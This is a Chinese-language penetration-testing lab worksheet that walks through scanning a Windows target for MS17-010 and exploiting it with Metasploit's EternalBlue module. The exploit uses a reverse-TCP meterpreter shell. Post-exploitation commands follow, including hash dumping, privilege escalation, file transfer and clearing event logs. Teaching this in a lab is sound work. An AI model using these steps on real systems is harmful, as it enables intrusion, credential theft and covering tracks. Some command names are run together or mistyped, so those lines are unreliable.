-Metasploit配置使用2
实验目的
熟悉ms17-010漏洞的原理及利用方法,掌握Metasploit的配置使用方法。
实验环境
操作机:Kali2018-TS
(1)操作系统:Kali Linux 2018.4
(2)登录账号密码:操作系统帐号root,密码Sangfor!7890
靶机 pt-env
(1)操作系统:Windows
(2)安装的应用软件:PHPStudy 2013、DVWA漏洞网站环境
(3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890
实验原理
- 关于Metasploit
Metasploit是一个强大的开源平台,可以用来开发、测试和使用恶意代码,同时为渗透测试、shellcode编写和漏洞研究提供了一个可靠平台。
- 关于ms17-010(Windows SMB远程执行代码漏洞)
微软安全公告KB4013389:
Microsoft 安全公告 MS17-010 - 严重 | Microsoft Docs
此安全更新程序修复了Microsoft Windows中的多个漏洞。如果攻击者向Windows SMBv1服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。
实验步骤
- 启动Metasploit
(1)在操作机Kali2018-TS上点击左侧菜单中的终端图标,启动终端:(提示符msf>)
msfdb init && msfconsole
2.检测靶机是否存在ms12-010漏洞
(1)在Metasploit终端下输入以下命令查找ms17-010相关的模块:
Search ms17-010
- 分别输入以下命令,使用smb_ms17_010模块对靶机进行漏洞测试,确认其存在ms17-010漏洞:
use auxiliary/scanner/smb/smb_ms17_010 //使用smb_ms17-010模块
show options //查看该模块需要设置那些参数
set RHOSTS【靶机ip】 //设置目的机的IP地址
run //执行
执行结果显示:靶机存在ms17-010漏洞
3.利用ms17-010漏洞对靶机执行溢出攻击
(1)分别输入以下命令,使用ms17_010_eternalblue模块对目标机的ms17-010漏洞进行利用:
use exploit/windows/smb/ms17_010_eternalblue //使用ms17_010_eternalblue模块
set RHOST[靶机IP] //设置远程主机(靶机)的IP地址
set LHOST[操作机IP] //设置本地主机(操作机)的IP地址
set payloadwindows/x64/meterpreter/reverse_tcp //使用payload:meterpreter/reverse_tcp
set RPORT 445 //设置目标端口
set target 0 //设置目标操作系统类型
run //执行
4.后渗透模块meterpreter的使用可以在meterpreter提示符下使用下列命令,进行后渗透操作:
Pwd //打印当前工作目录
Sysinfo //查看系统信息
Getuid //获取当前权限的用户
Idps //查看当前目标机上运行的进程列表和
Pidgetsystem //获取system权限
screenshot//截取目标主机当前屏幕
hashdump//获取用户名与hash口令shell//获取目标主机
shellupload//上传一个文件download//下载一个文件
execute//执行目标系统中的文件(-f指定文件,-i执行可交互模式,-H隐藏窗口)
clearev//清除日志
background//将meterpreter放入后台(使用sessions-i重新连接到会话)